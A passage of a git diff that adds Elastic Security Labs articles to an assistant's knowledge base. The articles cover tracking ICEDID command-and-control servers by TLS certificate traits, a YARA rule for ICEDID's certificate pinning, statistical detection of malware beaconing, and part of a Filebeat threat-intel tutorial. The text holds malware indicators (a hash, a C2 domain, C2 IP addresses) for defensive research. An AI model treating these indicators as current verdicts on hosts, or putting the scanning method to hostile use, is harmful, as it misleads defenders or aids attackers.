+> It should be noted that JARM and JA3S are frequently not uncommon enough to convict a host by themselves. As an example, in the Censys dataset, the JARM fingerprint identified over 15k hosts, and the JA3S fingerprint identified over 3.3M hosts. Looking at the JARM and JA3S values together still had approximately 8k hosts. These are data points on the journey to an answer, not the answer itself.
+
+### ICEDID implant defense
+
+Before ICEDID communicates with its C2 server, it performs a TLS certificate check by comparing the certificate serial number with a hash of the certificate's public key. As certificate serial numbers should all be unique, ICEDID uses a self-signed certificate and an expected certificate serial number as a way to validate the TLS certificate. If the hash of the public key and serial number do not match, the communication with the C2 server does not proceed.
+
+![ICEDID certificate validation function](/assets/images/icedids-network-infrastructure-is-alive-and-well/image10.jpg)
+
+We used the Check Point Python script (which returns a **true** or **false** result for each passed IP address) to perform an additional check to improve our confidence that the IP addresses were part of the ICEDID C2 infrastructure and not simply a coincidence in having the same subject and issuer information of the ICEDID TLS certifications. A **true** result has a matching ICEDID fingerprint and a **false** result does not. This resulted in 103 IPs that were confirmed as having an ICEDID TLS certificate and 10 that did not (as of October 14, 2022).
+
+![ICEDID TLS certificate confirmation](/assets/images/icedids-network-infrastructure-is-alive-and-well/image5.jpg)
+
+### Importing into Elasticsearch
+
+Now that we have a way to collect IPs based on the TLS certificate elements and a way to add additional context to aid in conviction; we can wrap the logic in a Bash script as a way to automate this process and parse the data for analysis in Elasticsearch.
+
+```
+#!/bin/bash -eu
+
+set -o pipefail
+
+SEARCH='services.tls.certificates.leaf_data.subject_dn:"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd" and services.tls.certificates.leaf_data.issuer_dn:"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd" and services.port=443'
+
+while read -r line; do
+    _ts=$(date -u +%FT%TZ)
+    _ip=$(echo ${line} | base64 -d | jq '.ip' -r)
+    _port=$(echo ${line} | base64 -d | jq '.port' -r)
+    _view=$(censys view "${_ip}" | jq -c)
+    _is_icedid=$(python3 -c "import icedid_checker; print(icedid_checker.test_is_icedid_c2('${_ip}','${_port}'))")
+
+    echo "${_view}" | jq -S --arg is_icedid "${_is_icedid}" --arg timestamp "${_ts}" '. + {"@timestamp": $timestamp, "threat": {"software": {"icedid": {"present": $is_icedid}}}}'
+done < <(censys search --pages=-1 "${SEARCH}" | jq '.[] | {"ip": .ip, "port": (.services[] | select(.certificate?).port)} | @base64' -r) | tee icedid_infrastructure.ndjson
+```
+
+This outputs the data as an NDJSON document called **icedid_infrastructure.ndjson** that we can upload into Elasticsearch.
+
+![Identified ICEDID IP infrastructure](/assets/images/icedids-network-infrastructure-is-alive-and-well/image8.png)
+
+In the above image, we can see that there are hosts that have the identified JARM fingerprint, the identified TLS issuer and subject elements, but did not pass the Check Point validation check. Additionally, one of the two hosts has a different JA3S fingerprint. This highlights the value of the combination of multiple data sources to inform confidence scoring.
+
+We are also [providing this script](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz) for others to use.
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+As stated above, ICEDID has been extensively analyzed, so below we are listing the tactics and techniques that we observed and are covered in this research publication. If you’re interested in the full set of MITRE ATT&CK tactics and techniques, you can check out MITRE’s [page](https://attack.mitre.org/software/S0483/) on ICEDID.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Discovery](https://attack.mitre.org/tactics/TA0007/)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+- [Reconnaissance](https://attack.mitre.org/tactics/TA0043)
+- [Resource development](https://attack.mitre.org/tactics/TA0042)
+- [Initial access](https://attack.mitre.org/tactics/TA0001)
+- [Command and control](https://attack.mitre.org/tactics/TA0011)
+- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Permission Groups Discovery](https://attack.mitre.org/techniques/T1069/)
+- [Account Discovery](https://attack.mitre.org/techniques/T1087/)
+- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1087/)
+- [Software Discovery](https://attack.mitre.org/techniques/T1518/)
+- [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218/)
+- [Remote System Discovery](https://attack.mitre.org/techniques/T1018/)
+- [Network Share Discovery](https://attack.mitre.org/techniques/T1135/)
+- [Phishing: Spearphishing attachment](https://attack.mitre.org/techniques/T1566/001)
+- [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)
+- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)
+- [Process Injection](https://attack.mitre.org/techniques/T1055/)
+
+## Detections and preventions
+
+### Detection logic
+
+- [Enumeration of Administrator Accounts](https://www.elastic.co/guide/en/security/current/enumeration-of-administrator-accounts.html)
+- [Command Shell Activity Started via RunDLL32](https://www.elastic.co/guide/en/security/current/command-shell-activity-started-via-rundll32.html)
+- [Security Software Discovery using WMIC](https://www.elastic.co/guide/en/security/current/security-software-discovery-using-wmic.html)
+- [Suspicious Execution from a Mounted Device](https://www.elastic.co/guide/en/security/current/suspicious-execution-from-a-mounted-device.html)
+- [Windows Network Enumeration](https://www.elastic.co/guide/en/security/current/windows-network-enumeration.html)
+
+### Preventions
+
+- Malicious Behavior Detection Alert: Command Shell Activity
+- Memory Threat Detection Alert: Shellcode Injection
+- Malicious Behavior Detection Alert: Unusual DLL Extension Loaded by Rundll32 or Regsvr32
+- Malicious Behavior Detection Alert: Suspicious Windows Script Interpreter Child Process
+- Malicious Behavior Detection Alert: RunDLL32 with Unusual Arguments
+- Malicious Behavior Detection Alert: Windows Script Execution from Archive File
+
+### YARA
+
+Elastic Security has created [YARA rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_IcedID.yar) to identify this activity. Below is a YARA rule specifically to identify the TLS certificate pinning function used by ICEDID.
+
+```
+rule Windows_Trojan_IcedID_cert_pinning {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-10-17"
+        last_modified = "2022-10-17"
+        threat_name = "Windows.Trojan.IcedID"
+        arch_context = "x86"
+        license = "Elastic License v2"
+        os = "windows"
+    strings:
+		$cert_pinning = { 74 ?? 8B 50 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F BA F0 ?? 48 8B 51 ?? 48 8B 4A ?? 39 01 74 ?? 35 14 24 4A 38 39 01 74 ?? }
+    condition:
+        $cert_pinning
+}
+```
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid)
+- [https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/)
+- [https://attack.mitre.org/software/S0483/](https://attack.mitre.org/software/S0483/)
+
+## Indicators
+
+The indicators observed in this research are posted below. All artifacts (to include those discovered through TLS certificate pinning) are also [available for download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc090b3574bb4e7be/633615e4a920fd42f67e7534/ref2731-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+| Indicator                                                        | Type      | Note                 |
+| ---------------------------------------------------------------- | --------- | -------------------- |
+| db91742b64c866df2fc7445a4879ec5fc256319e234b1ac5a25589455b2d9e32 | SHA256    | ICEDID malware       |
+| yolneanz[.]com                                                   | domain    | ICEDID C2 domain     |
+| 51.89.190[.]220                                                  | ipv4-addr | ICEDID C2 IP address |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/identifying_beaconing_malware_using_elastic.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/identifying_beaconing_malware_using_elastic.md
new file mode 100644
index 0000000000000..93dd7fa328f46
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/identifying_beaconing_malware_using_elastic.md
@@ -0,0 +1,154 @@
+---
+title: "Identifying beaconing malware using Elastic"
+slug: "identifying-beaconing-malware-using-elastic"
+date: "2023-03-01"
+description: "In this blog, we walk users through identifying beaconing malware in their environment using our beaconing identification framework."
+author:
+  - slug: apoorva-joshi
+  - slug: thomas-veasey
+  - slug: craig-chamberlain
+image: "blog-thumbnail-securitymaze.jpg"
+category:
+  - slug: machine-learning
+  - slug: detection-science
+---
+
+The early stages of an intrusion usually include initial access, execution, persistence, and command-and-control (C2) beaconing. When structured threats use zero-days, these first two stages are often not detected. It can often be challenging and time-consuming to identify persistence mechanisms left by an advanced adversary as we saw in the [2020 SUNBURST supply chain compromise](https://www.elastic.co/blog/elastic-security-provides-free-and-open-protections-for-sunburst). Could we then have detected SUNBURST in the initial hours or days by finding its C2 beacon?
+
+The potential for beaconing detection is that it can serve as an early warning system and help discover novel persistence mechanisms in the initial hours or days after execution. This allows defenders to disrupt or evict the threat actor before they can achieve their objectives. So, while we are not quite "left of boom" by detecting C2 beaconing, we can make a big difference in the outcome of the attack by reducing its overall impact.
+
+In this blog, we talk about a beaconing identification framework that we built using Painless and aggregations in the Elastic Stack. The framework can not only help threat hunters and analysts monitor network traffic for beaconing activity, but also provides useful indicators of compromise (IoCs) for them to start an investigation with. If you don’t have an Elastic Cloud cluster but would like to try out our beaconing identification framework, you can start a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.
+
+## **Beaconing — A primer**
+
+An enterprise's defense is only as good as its firewalls, antivirus, endpoint detection and intrusion detection capabilities, and SOC (Security Operations Center) — which consists of analysts, engineers, operators administrators, etc. who work round the clock to keep the organization secure. Malware however, enters enterprises in many different ways and uses a variety of techniques to go undetected. An increasingly common method being used by adversaries nowadays to evade detection is to use C2 beaconing as a part of their attack chain, given that it allows them to blend into networks like a normal user.
+
+In networking, beaconing is a term used to describe a continuous cadence of communication between two systems. In the context of malware, beaconing is when malware periodically calls out to the attacker's C2 server to get further instructions on tasks to perform on the victim machine. The frequency at which the malware checks in and the methods used for the communications are configured by the attacker. Some of the common protocols used for C2 are HTTP/S, DNS, SSH, and SMTP, as well as common cloud services like Google, Twitter, Dropbox, etc. Using common protocols and services for C2 allows adversaries to masquerade as normal network traffic and hence evade firewalls.
+
+While on the surface beaconing can appear similar to normal network traffic, it has some unique traits with respect to timing and packet size, which can be modeled using standard statistical and signal processing techniques.
+
+Below is an example of a Koadic C2 beacon, which serves the malicious payload using the DLL host process. As you can see, the payload beacons consistently at an interval of 10 minutes, and the source, as well as destination packet sizes, are almost identical.
+
+![Example of a Koadic C2 beacon](/assets/images/identifying-beaconing-malware-using-elastic/1-koadic-beacon.png)
+
+It might seem like a trivial task to catch C2 beaconing if all beacons were as neatly structured and predictable as the above. All one would have to look for is periodicity and consistency in packet sizes. However, malware these days is not as straightforward.
+
+![Example of an Emotet beacon](/assets/images/identifying-beaconing-malware-using-elastic/2-emotet-beacon.jpg)
+
+Most sophisticated malware nowadays adds a "jitter" or randomness to the beacon interval, making the signal more difficult to detect. Some malware authors also use longer beacon intervals. The beaconing identification framework we propose accounts for some of these elusive modifications to traditional beaconing behavior.
+
+## **Our approach**
+
+We’ve discussed a bit about the why and what — in this section we dig deeper into how we identify beaconing traffic. Before we begin, it is important to note that beaconing is merely a communication characteristic. It is neither good nor evil by definition. While it is true that malware heavily relies on beaconing nowadays, a lot of legitimate software also exhibits beaconing behaviour.
+
+While we have made efforts to reduce false positives, this framework should be looked at as a means for beaconing identification to help reduce the search space for a threat hunt, not as a means for detection. That said, indicators produced by this framework, when combined with other IoCs, can potentially be used to detect on malicious activity.
+
+The beacons we are interested in comprise traffic from a single running process on a particular host machine to one or more external IPs. Given that the malware can have both short (order of seconds) and long (order of hours or days) check-in intervals, we will restrict our attention to a time window that works reasonably for both and attempt to answer the question: “What is beaconing in my environment right now or recently?” We have also parameterized the inputs to the framework to allow users to configure important settings like time window, etc. More on this in upcoming sections.
+
+When dealing with large data sets, such as network data for an enterprise, you need to think carefully about what you can measure, which allows you to scale effectively. Scaling has several facets, but for our purposes, we have the following requirements:
+
+1. Work can be parallelised over different shards of data stored on different machines
+2. The amount of data that needs to move around to compute what is needed must be kept manageable.
+
+Multiple approaches have been suggested for detecting beaconing characteristics, but not all of them satisfy these constraints. For example, a popular choice for detecting beacon timing characteristics is to measure the interval between events. This proves to be too inefficient to use on large datasets because the events can't be processed across multiple shards.
+
+Driven by the need to scale, we chose to detect beaconing by bucketing the data in the time window to be analyzed. We gather the event count and average bytes sent and received in each bucket. These statistics can be computed in MapReduce fashion and values from different shards can be combined at the coordinating node of an Elasticsearch query.
+
+Furthermore, by controlling the ratio between the bucket and window lengths, the data we pass per running process has predictable memory consumption, which is important for system stability. The whole process is illustrated diagrammatically below:
+
+![Bucketing data for analysis](/assets/images/identifying-beaconing-malware-using-elastic/3-bucketing-data.jpg)
+
+A key attribute of beaconing traffic is it often has similar netflow bytes for the majority of its communication. If we average the bytes over all the events that fall in a single bucket, the average for different buckets will in fact be even more similar. This is just the law of large numbers in action. A good way to measure similarity of several positive numbers (in our case these are average bucket netflow bytes) is using a statistic called the [coefficient of variation](https://en.wikipedia.org/wiki/Coefficient_of_variation) (COV). This captures the average relative difference between the values and their mean. Because this is a relative value, a COV closer to 0 implies that values are tightly clustered around their mean.
+
+We also found that occasional spikes in the netflow bytes in some beacons were inflating the COV statistic. In order to rectify this, we simply discarded low and high percentile values when computing the COV, which is a standard technique for creating a robust statistic. We threshold the value of this statistic to be significantly less than one to detect this characteristic of beacons.
+
+For periodicity, we observed that signals displayed one of two characteristics when we viewed the bucket counts. If the period was less than the time bucket length (i.e. high frequency beacons), then the count showed little variation from bucket to bucket. If the period was longer than the time bucket length (i.e. low frequency beacons), then the signal had high autocorrelation. Let's discuss these in detail.
+
+To test for high frequency beacons, we use a statistic called [relative variance](https://en.wikipedia.org/wiki/Index_of_dispersion) (RV). The rate of many naturally occurring phenomena are well described by a [Poisson distribution](https://en.wikipedia.org/wiki/Poisson_distribution#Occurrence_and_applications). The reason for this is that if events arrive randomly at a constant average rate and the occurrence of one event doesn’t affect the chance of others occurring, then their count in a fixed time interval must be Poisson distributed.
+
+Just to underline this point, it doesn’t matter the underlying mechanisms for that random delay between events (making a coffee, waiting for your software to build, etc.)— if those properties hold, their rate distribution is always the same. Therefore, we expect that the bucket counts to be Poisson distributed for much of the traffic in our network, but not for beacons, which are much more regular. A feature of the Poisson distribution is that its variance is equal to its average, i.e. its RV is 1. Loosely, this means that if the RV of our bucket counts is closer to 0, the signal is more regular than a Poisson process.
+
+[Autocorrelation](https://en.wikipedia.org/wiki/Autocorrelation) is a useful statistic for understanding when a time series repeats itself. The basic idea behind autocorrelation is to compare the time series values to themselves after shifting them in time. Specifically, it is the covariance between the two sets of values (which is larger when they are more similar), normalized by dividing it by the square root of the variances of the two sets, which measures how much the values vary among themselves.
+
+This process is illustrated schematically below. We apply this to the time series comprising the bucket counts: if the signal is periodic then the time bucketed counts must also repeat themselves. The nice thing about autocorrelation from our perspective is that it is capable of detecting any periodic pattern. For example, the events don’t need to be regularly spaced but might repeat like two events occurring close to one another in time, followed by a long gap and so on.
+
+![](/assets/images/identifying-beaconing-malware-using-elastic/4-diagramming-representation.jpg)
+
+We don’t know the shift beforehand that will maximize the similarity between the two sets of values, so we search over all shifts for the maximum. This, in effect, is the period of the data — the closer its autocorrelation is to one, the closer the time series is to being truly periodic. We threshold the autocorrelation close to one to test for low frequency beacons.
+
+Finally, we noted that most beaconing malware these days incorporates jitter. How does autocorrelation deal with this? Well first off, autocorrelation isn’t a binary measure — it is a sliding scale: the closer the value is to 1 the more similar the two sets of values are to one another. Even if they are not identical but similar it can still be close to one. In fact, we can do better than this by modelling how random jitter affects autocorrelation and undoing its effect. Provided the jitter isn’t too large, the process to do this turns out to be about as complex as just finding the maximum autocorrelation.
+
+In our implementation, we’ve made the percentage configurable, although one would always use a small-ish percentage to avoid flagging too much traffic as periodic. If you'd like to dig into the gory details of our implementation, all the artifacts are available as a GitHub [release](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1) in our detection rules repository.
+
+## **How do we do this using Elasticsearch?**
+
+Elasticsearch has some very powerful tools for ad hoc data analysis. The [scripted metric aggregation](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-scripted-metric-aggregation.html) is one of them. The nice thing about this aggregation is that it allows you to write custom Painless scripts to derive different metrics about your data. We used the aggregation to script out the beaconing tests.
+
+In a typical environment, the cardinality of the distinct processes running across endpoints is rather high. Trying to run an aggregation that partitions by every running process is therefore not feasible. This is where another feature of the Elastic Stack comes in handy. A [transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is a complex aggregation which paginates through all your data and writes results to a destination index.
+
+There are various basic operations available in transforms, one of them being partitioning data at scale. In our case, we partitioned our network event logs by host and process name and ran our scripted metric aggregation against each host-process name pair. The transform also writes out various beaconing related indicators and statistics. A sample document from the resulting destination index is as follows:
+
+![Sample document produced by the beaconing transform](/assets/images/identifying-beaconing-malware-using-elastic/5-sample-beaconing.jpg)
+
+As you can see, the document contains valuable beaconing-related information about the process. First off, the beacon_stats.is_beaconing indicator says whether or not we found the process to be beaconing. If it is, as in the case above, the document will also contain important metadata, such as the frequency of the beacon. The indicator beacon_stats.periodic says whether or not the signal is a low-frequency beacon, while the indicator beacon_stats.low_count_variation indicates whether or not it is a high-frequency beacon.
+
+Furthermore, the indicators beacon_stats.low_source_bytes_variation and low_destination_bytes_variation indicate whether or not the source and destination bytes sent during the beaconing communication were more or less uniform. Finally, you will also notice the beaconing_score indicator, which is a value from 1-3, representing the number of beaconing tests satisfied by the process for that time period.
+
+Writing such metadata out to an index also means that you can search for different facets of beaconing software in your environment. For example, if you want to search for low frequency beaconing processes in your environment, you would query for documents where the beacon_stats.periodic indicator is true and beacon_stats.low_count_variation is false. You can also build second order analytics on top of the indexed data, such as using [anomaly detection](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html) to find rare beaconing processes, or using a [significant terms aggregation](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-bucket-significantterms-aggregation.html) to detect lateral movement of beaconing malware in your environment.
+
+Finally, we’ve included several dashboards for your threat hunters and analysts to use for monitoring beaconing activity in your environment. These can be found in the [release package](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1) as well.
+
+## **Tuning parameters and filtering**
+
+Advanced users can also tune important parameters to the scripted metric aggregation in the transforms, like jitter percentage, time window, etc. If you'd like to change the default parameters, all you would need to do is delete the transform, change the parameters, and restart it. The parameters you can tune are as follows:
+
+- number_buckets_in_range: The number of time buckets we split the time window into. You need enough to ensure you get reasonable estimates for the various statistics, but too many means the transform will use more memory and compute.
+- time_bucket_length: The length of each time bucket. This controls the time window, so the larger this value the longer the time window. You might set this longer if you want to check for very low frequency beacons.
+- number_destination_ips: The number of destination IPs to gather in the results. Setting this higher increases the transform resource usage.
+- max_beaconing_bytes_cov: The maximum coefficient of variation in the payload bytes for the low source and destination bytes variance test. Setting this higher will increase the chance of detecting traffic as beaconing, so would likely increase [recall](https://en.wikipedia.org/wiki/Precision_and_recall) for malicious C2 beacons. However, it will also reduce the [precision](https://en.wikipedia.org/wiki/Precision_and_recall) of the test.
+- max_beaconing_count_rv: The maximum relative variance in the bucket counts for the high frequency beacon test. As with max_beaconing_bytes_cov, we suggest tuning this parameter based on the kind of tradeoff you want between precision and recall.
+- truncate_at: The lower and upper fraction of bucket values discarded when computing max_beaconing_bytes_cov and max_beaconing_count_rv. This allows you to ignore occasional changes in traffic patterns. However, if you retain too small a fraction of the data, these tests will be unreliable.
+- min_beaconing_count_autocovariance: The minimum autocorrelation of the signal for the low frequency beacon test. Lowering this value will likely result in an increase in recall for malicious C2 beacons, at the cost of reduced test precision. As with some of the other parameters mentioned above, we suggest tuning this parameter based on the kind of tradeoff you want between precision and recall.
+- max_jitter: The maximum amount by which we assume that a periodic beacon is jittered, as a fraction of its period.
+
+You can also make changes to the transform query. We currently look for beaconing activity over a 6h time range, but you can change this to a different time range. As mentioned previously, beaconing is not a characteristic specific to malware and a lot of legitimate, benign processes also exhibit beaconing-like activity.
+
+In order to curb the false positive rate, we have included a starter list of filters in the transform query to exclude known benign beaconing processes that we observed during testing, and a list of IPs that fall into two categories:
+
+1. The source IP is local and the destination is remote
+2. For certain Microsoft processes, the destination IP is in a Microsoft block
+
+You can add to this list based on what you see in your environment.
+
+## **Evaluation**
+
+In order to measure the effectiveness of our framework as a reduced search space for beaconing activity, we wanted to test two aspects:
+
+1. Does the framework flag actual malicious beaconing activity?
+2. By how much does the framework reduce the search space for malicious beacons?
+
+In order to test the performance on malware beacons, we ran the transform on some synthetic data as well as some real malware! We set up test ranges for Emotet and Koadic, and also tested it on NOBELIUM logs we had from several months ago. The results from the real malware tests are worth mentioning here.
+
+![Beaconing metadata for NOBELIUM](/assets/images/identifying-beaconing-malware-using-elastic/6-beaconing-metadata.jpg)
+
+For NOBELIUM, the beaconing transform catches the offending process, rundll32.exe, as well as the two destination IPs, 192.99.221.77 and 83.171.237.173, which were among the main IoCs for NOBELIUM.
+
+For Koadic and Emotet as well, the transform was able to flag the process as well as the known destination IPs on which the test C2 listeners were running. The characteristics of each of the beacons were different. For example, Koadic was a straightforward, high-frequency beacon that satisfied all the beaconing criteria being checked in the transform i.e. periodicity, as well as low variation of source and destination bytes. Emotet was slightly trickier since it was a low frequency beacon with a high jitter percentage. But we were able to detect it due to the low variation in the source bytes of the beacon.
+
+To test the amount of reduction in search space, we ran the transform over three weeks on an internal cluster that was receiving network event logs from ~ 2k hosts during the testing period. We measured the reduction in search space based on the number of network event log messages, processes, and hosts an analyst or threat hunter would have to sift through before and after running the transform, in order to identify malicious beacons. The numbers are as follows:
+
+![Search space reduction metrics as a result of the beaconing transform](/assets/images/identifying-beaconing-malware-using-elastic/7-search-space-reduction.jpg)
+
+While the reduction in search space is obvious, another point to note is the scale of data that the transforms are able to churn through comfortably, which becomes an important aspect to consider, especially in production environments. Additionally, we have also released dashboards (available in the [release package](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1)), which track metrics like prevalence of the beaconing processes, etc. that can help make informed decisions about further filtering of the search space.
+
+While the released dashboards, and the statistics in the above table are based on cases where the beacon_stats.is_beaconing indicator is true i.e. beacons that satisfy either of the beaconing tests, threat hunters may want to further streamline their search by starting with the most obvious beaconing-like cases and then moving on to the less obvious ones. This can be done by filtering and searching by the beacon_stats.beaconing_score indicator instead of beacon_stats.is_beaconing, where a score of 3 indicates a typical beacon (satisfying tests for periodicity as well as low variation in packet bytes), and score of 1 indicates a less obvious beacon (satisfying only one of the three tests).
+
+For reference, we observed the following on our internal cluster:
+
+![Streamlining your threat hunt using the Beaconing Score indicator](/assets/images/identifying-beaconing-malware-using-elastic/Screen_Shot_2022-01-06_at_4.36.40_PM.jpg)
+
+## What's next
+
+We’d love for you to try out our beaconing identification framework and give us feedback as we work on improving it. If you run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack), [discussion forums](https://discuss.elastic.co/c/security), or even our [open detections repository](https://github.com/elastic/detection-rules). Stay tuned for Part 2 of this blog, where we’ll cover going from identifying beaconing activity to actually detecting on malicious beacons!
+
+Try out our beaconing identification framework with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ingesting_threat_data_with_the_threat_intel_filebeat_module.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ingesting_threat_data_with_the_threat_intel_filebeat_module.md
new file mode 100644
index 0000000000000..07698eab7eb54
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/ingesting_threat_data_with_the_threat_intel_filebeat_module.md
@@ -0,0 +1,550 @@
+---
+title: "Ingesting threat data with the Threat Intel Filebeat module"
+slug: "ingesting-threat-data-with-the-threat-intel-filebeat-module"
+date: "2023-03-01"
+description: "Tutorial that walks through setting up Filebeat to push threat intelligence feeds into your Elastic Stack."
+author:
+  - slug: andrew-pease
+  - slug: marius-iversen
+image: "photo-edited-12-t.jpg"
+category:
+  - slug: security-operations
+  - slug: detection-science
+tags:
+  - tutorial
+  - filebeat
+  - threat intel
+---
+
+The ability for security teams to integrate threat data into their operations substantially helps their organization identify potentially malicious endpoint and network events using indicators identified by other threat research teams. In this blog, we’ll cover how to ingest threat data with the Threat Intel Filebeat module. In future blog posts, we’ll cover enriching threat data with the Threat ECS fieldset and operationalizing threat data with Elastic Security.
+
+## Elastic Filebeat modules
+
+Elastic Filebeat modules simplify the collection, parsing, and visualization of data stored in common log formats. Elastic publishes a variety of [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that are focused on collecting the data you want for use within Elasticsearch. These modules provide a standardized and “turnkey” method to ingest specific data sources into the Elastic Stack.
+
+Using these capabilities, the Threat Intel Filebeat module:
+
+- Consumes threat data from six open source feeds
+- Loads threat data into Elasticsearch
+- Normalizes threat data into the [Threat ECS fieldset](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html)
+- Enables threat analysis through dashboards and visualizations
+
+Analysts and threat hunters can use this data for raw threat hunting, enrichment, intelligence analysis and production, and detection logic.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/overview.jpg
+
+The six feeds included with the 7.13 Filebeat Threat Intel module are as follows (additional feeds may be added in the future):
+
+- [Abuse.ch Malware](https://urlhaus-api.abuse.ch/v1/payloads/recent)
+- [Abuse.ch URL](https://urlhaus.abuse.ch/)
+- [AlienVault Open Threat Exchange (OTX)](https://otx.alienvault.com/)
+- [Anomali Limo](https://www.anomali.com/resources/limo)
+- [Malware Bazaar](https://bazaar.abuse.ch/)
+- [Malware Information Sharing Platform (MISP)](https://www.misp-project.org/)
+
+Using the Threat Intel Filebeat module, you can choose from several open source threat feeds, store the data in Elasticsearch, and leverage the Kibana Security App to aid in security operations and intelligence analysis.
+
+## Threat Intel Filebeat module
+
+Generally, the Filebeat Threat Intel module can be started without any configuration to collect logs from Abuse.ch feeds, Anomali Limo, and Malware Bazaar. However, the optional AlienVault OTX and MISP datasets require tokens to authenticate to their feed sources. Thankfully, obtaining a token is a simple process.
+
+### AlienVault OTX
+
+The team over at Alien Labs® has created the Open Threat Exchange (OTX)® as an open threat intelligence community. This environment provides access to a diverse community of researchers and practitioners. OTX allows anyone in the community to discuss, research, validate, and share threat data. Additionally, OTX has an Application Programming Interface (API) endpoint that provides a read-only feed; which is how the Filebeat module consumes the OTX threat data.
+
+To access the OTX API, you simply need to [create an account](https://otx.alienvault.com/). Once you have an account, you can subscribe to specific OTX community reports and threat data feeds called “Pulses.” These Pulses are retrieved by the Filebeat module and stored in Elasticsearch.
+
+Pulses are updated at various cadences, but many are daily or even hourly. The Pulse has a summary of the threat, indicators, and various other enrichments that can help you contextually assess the threat in your environment.
+
+To subscribe to Pulses, select Browse → Pulses, and then subscribe to any Pulses that you’d like. You can sort by the most recently modified to identify the most active Pulses.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/av-pulse.jpg)
+
+Now that you’ve subscribed to Pulses of interest, we’ll need to collect your API key.
+
+### Retrieving Your API Key
+
+The API key is used to securely authenticate to OTX and obtain the indicators from Pulses.
+
+To retrieve your API key, select your userID → Settings, and then copy your OTX Key.
+
+![](/assets/images/ingesting-threat-data-with-the-threat-intel-filebeat-module/av-api.jpg)
+
+Now that we have your OTX Key, let’s set up MISP.
+
+## MISP
+
+The Malware Information Sharing Platform (MISP) is an open source project for collecting, storing, distributing, and sharing indicators about threats.
+
+While MISP is extremely powerful and has a tremendous variety of features, it can be a bit cumbersome to set up. If you are planning on setting up MISP for production, check out the [official documentation](https://github.com/MISP/MISP/tree/2.4/docs) for installing MISP on Kali, RHEL (incl. CentOS and Fedora), or Ubuntu.
+
+If your organization doesn’t have a MISP instance, you can use one of the many projects that use Docker to get MISP up and running. There’s a [great and maintained project](https://github.com/coolacid/docker-misp) by Jason Kendall (@coolacid) that is about as turnkey as you could ask for.
+
+### Standing up CoolAcid’s MISP Docker Containers
+
+As a caveat, this will cover a default development deployment of MISP. It should not be used in production. Please see the [official MISP documentation](https://github.com/MISP/MISP/tree/2.4/docs) for properly deploying a secure MISP instance.
+
+As a few prerequisites, you’ll need to have Docker Compose and Git installed:
+
+- **Docker Compose** is used to automate the deployment and configuration of the containers. You can check out [Docker’s documentation](https://docs.docker.com/compose/install/) on getting Compose installed.
+- **Git** is a version-control framework used to coordinate software development throughout contributors and community members. You can check out the [Git documentation](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git) on getting Git installed.
+
+Next, we need to clone CoolAcid’s repository and fire up the containers.
+
+- git clone: Copies the remote repository to your local machine into a file called “docker-misp”
+- cd docker-misp: Changes into the “docker-misp” directory
+- docker-compose up -d: Uses the docker-compose file in the “docker-misp” directory to download, build, and start all of the relevant containers in “detached mode” (in the background)
+
+```
+Code Block 1 - Starting MISP Containers
+
+$ git clone https://github.com/coolacid/docker-misp.git
+$ cd docker-misp
+$ docker-compose up -d
+
+Pulling misp (coolacid/misp-docker:core-latest)...
+core-latest: Pulling from coolacid/misp-docker
+a54cbf64e415: Pull complete
+84e78d2508ee: Pull complete
+433476aac54e: Pull complete
+780a2dfa04f6: Pull complete
+Digest: sha256:7f380ad0d858bdec2c4e220f612d80431b1a0b0cb591311ade38da53b50a4cc1
